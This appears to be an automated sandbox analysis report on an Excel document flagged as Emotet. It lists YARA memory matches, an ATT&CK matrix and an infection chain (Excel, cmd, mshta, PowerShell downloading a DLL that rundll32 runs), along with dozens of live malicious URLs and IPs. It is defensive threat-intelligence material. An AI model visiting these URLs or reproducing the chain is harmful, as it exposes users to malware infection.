                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000A.00000002.523913691.0000000002621000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578128416.00000000028F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523436520.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577400839.0000000000320000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.674984852.0000000000761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646503314.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675100735.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577595095.0000000000411000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646421210.0000000000C41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577894458.0000000000AD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577987476.0000000002480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580780340.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646662898.0000000002F91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577837506.0000000000A71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.645935439.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578250004.0000000002FC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646563852.0000000002670000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.526646791.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523882749.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646381329.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.526815635.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577793052.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.524151860.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.464757421.0000000000290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.581619652.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523693615.0000000000AB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577428378.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523730343.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523853691.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580991991.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.674911093.0000000000710000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523666393.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523513402.00000000004F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.645964256.0000000000181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646120317.0000000000420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675173904.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523491147.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646698678.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646029506.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646064656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523130788.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.649782159.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577866677.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675036629.00000000007C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646641702.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577472790.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523994055.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675503420.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646764610.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.524063481.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578315852.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.650185514.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578085930.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578205625.0000000002F50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646533313.00000000025F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.645994754.0000000000220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646245001.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.649670122.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646590734.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675011000.0000000000790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523320512.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578029021.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\QWER.dll, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts21
                            Scripting                            		1
                            Windows Service                            		1
                            Windows Service                            		1
                            Disable or Modify Tools                            		1
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium5
                            Ingress Tool Transfer                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API                            		Boot or Logon Initialization Scripts11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory3
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Email Collection                            		Exfiltration Over Bluetooth11
                            Encrypted Channel                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution                            		Logon Script (Windows)Logon Script (Windows)21
                            Scripting                            		Security Account Manager38
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		Automated Exfiltration3
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter                            		Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information                            		NTDS21
                            Security Software Discovery                            		Distributed Component Object Model1
                            Clipboard Data                            		Scheduled Transfer114
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution                            		Network Logon ScriptNetwork Logon Script2
                            Masquerading                            		LSA Secrets1
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell                            		Rc.commonRc.common1
                            Modify Registry                            		Cached Domain Credentials1
                            Process Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                            Virtualization/Sandbox Evasion                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                            Process Injection                            		Proc Filesystem1
                            Remote System Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Hidden Files and Directories                            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                            Rundll32                            		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562406 Sample: imedpub_2.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 51 129.232.188.93 xneeloZA South Africa 2->51 53 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->53 55 43 other IPs or domains 2->55 65 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->65 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 16 other signatures 2->71 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 49 C:\Users\user\Desktop\imedpub_2.xls, Composite 15->49 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 57 91.240.118.168, 49165, 49166, 80 GLOBALLAYERNL unknown 20->57 23 powershell.exe 16 7 20->23         started        process9 dnsIp10 59 dtmconsulting.ca 162.241.211.118, 443, 49169 UNIFIEDLAYER-AS-1US United States 23->59 61 praachichemfood.com 103.138.189.128, 49167, 49168, 80 GBLINK-AS-APGBLINKNETWORKSOLUTIONSPRIVATELIMITEDIN India 23->61 63 www.praachichemfood.com 23->63 47 C:\ProgramData\QWER.dll, PE32 23->47 dropped 77 Powershell drops PE file 23->77 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        32 rundll32.exe 28->32         started        process15 34 rundll32.exe 1 30->34         started        file16 45 C:\Windows\SysWOW64\...\pagi.wrr (copy), PE32 34->45 dropped 73 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->73 38 rundll32.exe 34->38         started        signatures17 process18 process19 40 rundll32.exe 1 38->40         started        signatures20 75 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->75 43 rundll32.exe 40->43         started        process21

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            imedpub_2.xls28%ReversingLabsDocument-Excel.Trojan.Emotet

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\QWER.dll100%Joe Sandbox ML

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            17.2.rundll32.exe.710000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.3150000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.210000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            9.2.rundll32.exe.2c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2f10000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.aa0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.370000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.140000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.300000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.27b0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.310000.3.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.140000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.410000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.25f0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.7f0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.ae0000.7.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2f60000.13.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2670000.11.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.4a0000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.28f0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.9d0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.4c0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2fd0000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.330000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.180000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.820000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.3e0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2620000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            17.2.rundll32.exe.760000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.260000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.25f0000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2f50000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.200000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            14.2.rundll32.exe.240000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.320000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.c40000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            16.2.rundll32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.a70000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2f90000.14.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.ad0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.2480000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.1b0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.290000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.790000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2870000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.29f0000.12.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            12.2.rundll32.exe.350000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2580000.9.unpack100%AviraHEUR/AGEN.1145233Download File
                            17.2.rundll32.exe.7c0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.ab0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.a80000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            12.2.rundll32.exe.2fc0000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.25c0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.b40000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.220000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.4f0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.420000.5.unpack100%AviraHEUR/AGEN.1145233Download File

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://haileywells.com/cgi-bin/KJUOaq/PE3100%Avira URL Cloudmalware
                            http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-114.png100%Avira URL Cloudmalware
                            https://onewaymedia.ro/wp-includ100%Avira URL Cloudmalware
                            https://lodev7.com/wp-content/dp100%Avira URL Cloudmalware
                            http://praachichemfood.com/public_html/SWmteCWBUkA89/PE3100%Avira URL Cloudmalware
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                            http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.theme.min.css?ver=4.9.7.2100%Avira URL Cloudmalware
                            https://www.praachichemfood.com/wp-json/100%Avira URL Cloudmalware
                            http://bakultante.com/tee5oeot/Q100%Avira URL Cloudmalware
                            http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-57.png100%Avira URL Cloudmalware
                            https://dtmconsulting.ca/wp-includes/dkCFwyE/100%Avira URL Cloudmalware
                            http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-32.png100%Avira URL Cloudmalware
                            https://onewaymedia.ro/wp-includes/k/PE3100%Avira URL Cloudmalware
                            https://lodev7.c0%Avira URL Cloudsafe
                            http://91.240.118.168/zqqw/zaas/fe.htmlW59wo100%Avira URL Cloudmalware
                            http://praachichemfood.com/public_html/SWmteCWBUkA89/100%Avira URL Cloudmalware
                            https://trochoi80club.com/wp-content/6shnRU/100%Avira URL Cloudmalware
                            http://www.praachichemfood.com100%Avira URL Cloudmalware
                            https://www.yepproject.org/wp-in100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/wp-content/themes/brooklyn/js/ut-scriptlibrary.min.js?ver=4.9.7.2100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.core.plugins.min.css?ver=5.9100%Avira URL Cloudmalware
                            http://praachichemfood.com/publi100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/100%Avira URL Cloudmalware
                            http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.png100%Avira URL Cloudmalware
                            http://estiloindustria.com.br/wp100%Avira URL Cloudmalware
                            https://dtmconsulting.ca100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.pngPE3100%Avira URL Cloudmalware
                            http://www.protware.com0%URL Reputationsafe
                            https://worldaviationhub.com/wp-100%Avira URL Cloudmalware
                            https://worldaviationhub.com/wp-includes/Lik/PE3100%Avira URL Cloudmalware
                            https://dtmconsulting.ca/wp-includes/dkCFwyE/PE3100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.5100%Avira URL Cloudmalware
                            https://www.praachichemfood.com/feed/100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.4100%Avira URL Cloudmalware
                            https://futurelube.com/wp-admin/100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.htmlE59em100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.html100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.htmlEL100%Avira URL Cloudmalware
                            https://worldaviationhub.com/wp-includes/Lik/100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/xmlrpc.php100%Avira URL Cloudmalware
                            https://mortgageadviser.director0%Avira URL Cloudsafe
                            http://www.praachichemfood.com/wp-content/plugins/ut-shortcodes/js/plugins/modernizr/modernizr.min.j100%Avira URL Cloudmalware
                            http://ocsp.entrust.net030%URL Reputationsafe
                            https://futurelube.com/wp-admin/6GLpl4ehsdCBX3z/100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/wp-content/plugins/mystickyelements/css/mystickyelements-front.min.cs100%Avira URL Cloudmalware
                            http://www.protware.com&wa0%Avira URL Cloudsafe
                            https://trochoi80club.com/wp-content/6shnRU/PE3100%Avira URL Cloudmalware
                            https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/100%Avira URL Cloudmalware
                            http://91.240.110%URL Reputationsafe
                            https://trochoi80club.com/wp-con100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2100%Avira URL Cloudmalware
                            http://www.protware.com/0%URL Reputationsafe
                            http://bakultante.com/tee5oeot/Q/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.htmlP41yl100%Avira URL Cloudmalware
                            https://lodev7.com/wp-content/dpwjiJivrpgO1F2/100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.htmlN100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.htmlWinSta0100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.core.fonts.min.css?ver=5.9100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0100%Avira URL Cloudmalware
                            https://futurelube.com/wp-admin/6GLpl4ehsdCBX3z/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.htmlB100%Avira URL Cloudmalware
                            https://haileywells.com/cgi-bin/KJUOaq/100%Avira URL Cloudmalware
                            https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/100%Avira URL Cloudmalware
                            http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/PE3100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.htmlP100%Avira URL Cloudmalware
                            http://ocsp.entrust.net0D0%URL Reputationsafe
                            https://haileywells.com/cgi-bin/100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/wp-includes/wlwmanifest.xml100%Avira URL Cloudmalware
                            https://www.praachichemfood.com/comments/feed/100%Avira URL Cloudmalware
                            http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-144.png100%Avira URL Cloudmalware
                            https://dtmconsulting.ca/wp-incl100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/wp-content/themes/brooklyn/style.css?ver=4.9.7.2100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.htmlHEAP_SIGNATURE4100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.htmlmshta100%Avira URL Cloudmalware
                            http://bakultante.com/tee5oeot/Q/100%Avira URL Cloudmalware
                            https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/PE3100%Avira URL Cloudmalware
                            https://www.praachichemfood.com/xmlrpc.php?rsd100%Avira URL Cloudmalware
                            https://onewaymedia.ro/wp-includes/k/100%Avira URL Cloudmalware
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                            http://91.240.118.168/zqqw/zaas/fe.html.0100%Avira URL Cloudmalware
                            https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/PE3100%Avira URL Cloudmalware
                            http://praachichemfood.com100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.shortcode.min.css?ver=5.9100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.vc.shortcodes.min.css?ver=5.9100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.htmlhttp://91.240.118.168/zqqw/zaas/fe.html100%Avira URL Cloudmalware
                            http://91.240.118.168100%URL Reputationmalware
                            https://lodev7.com/wp-content/dpwjiJivrpgO1F2/PE3100%Avira URL Cloudmalware
                            http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-72.png100%Avira URL Cloudmalware
                            http://www.praachichemfood.com/wp-content/plugins/mystickyelements/css/font-awesome.min.css?ver=2.0.100%Avira URL Cloudmalware
                            http://91.240.118.168/zqqw/zaas/fe.htmlfunction100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            dtmconsulting.ca
                            		162.241.211.118
                            		truefalse
                              		unknown
                              praachichemfood.com
                              		103.138.189.128
                              		truefalse
                                		unknown
                                www.praachichemfood.com
                                		unknown
                                		unknownfalse
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  https://dtmconsulting.ca/wp-includes/dkCFwyE/true
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://praachichemfood.com/public_html/SWmteCWBUkA89/true
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://91.240.118.168/zqqw/zaas/fe.pngtrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://91.240.118.168/zqqw/zaas/fe.htmltrue
                                  • Avira URL Cloud: malware
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://haileywells.com/cgi-bin/KJUOaq/PE3powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-114.pngpowershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
